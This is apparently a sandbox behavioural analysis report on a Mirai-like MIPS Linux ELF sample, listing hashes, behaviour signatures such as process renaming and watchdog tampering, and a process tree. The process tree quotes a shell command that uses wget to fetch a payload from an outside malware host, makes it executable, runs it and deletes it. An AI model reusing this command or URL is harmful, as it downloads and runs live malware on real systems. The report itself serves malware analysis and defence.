Analysis
-
max time kernel
145s -
max time network
133s -
platform
debian-9_mips -
resource
debian9-mipsbe-20231222-en -
resource tags
arch:mipsimage:debian9-mipsbe-20231222-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
20/02/2024, 05:57
Behavioral task
behavioral1
Sample
b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf
Resource
debian9-mipsbe-20231222-en
General
-
Target
b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf
-
Size
155KB
-
MD5
8fdf47500c9dee0824a4e42cbca73109
-
SHA1
fa3a71afd0a3425b32d36dfe660e6d40f6e89f9d
-
SHA256
b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe
-
SHA512
e56d72f0c744126b40760ce450f950211872f2394bd84b987e5f28f3cbffa0f36c6e4bd981dd87520f00e4879ad6c6bc5ff81de9fbcb2486bbbead275f2ba48d
-
SSDEEP
3072:B7esBFP23rWfOB7ZOOyGkWKmrThPaLEne7rNb:1euCloGkrmrThPaLEne7rNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 721 b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 753 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf/tmp/b93e12c3b04ce268766dcfb0ec916a7b28a3608773f378d07ab0184e7d6e2afe.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:721 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:722
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:726
-
-
/bin/chmodchmod 777 .....3⤵PID:752
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:753
-
-
/bin/sh/bin/sh ./.....3⤵PID:753
-
-
/bin/rmrm -rf .....3⤵PID:756
-
-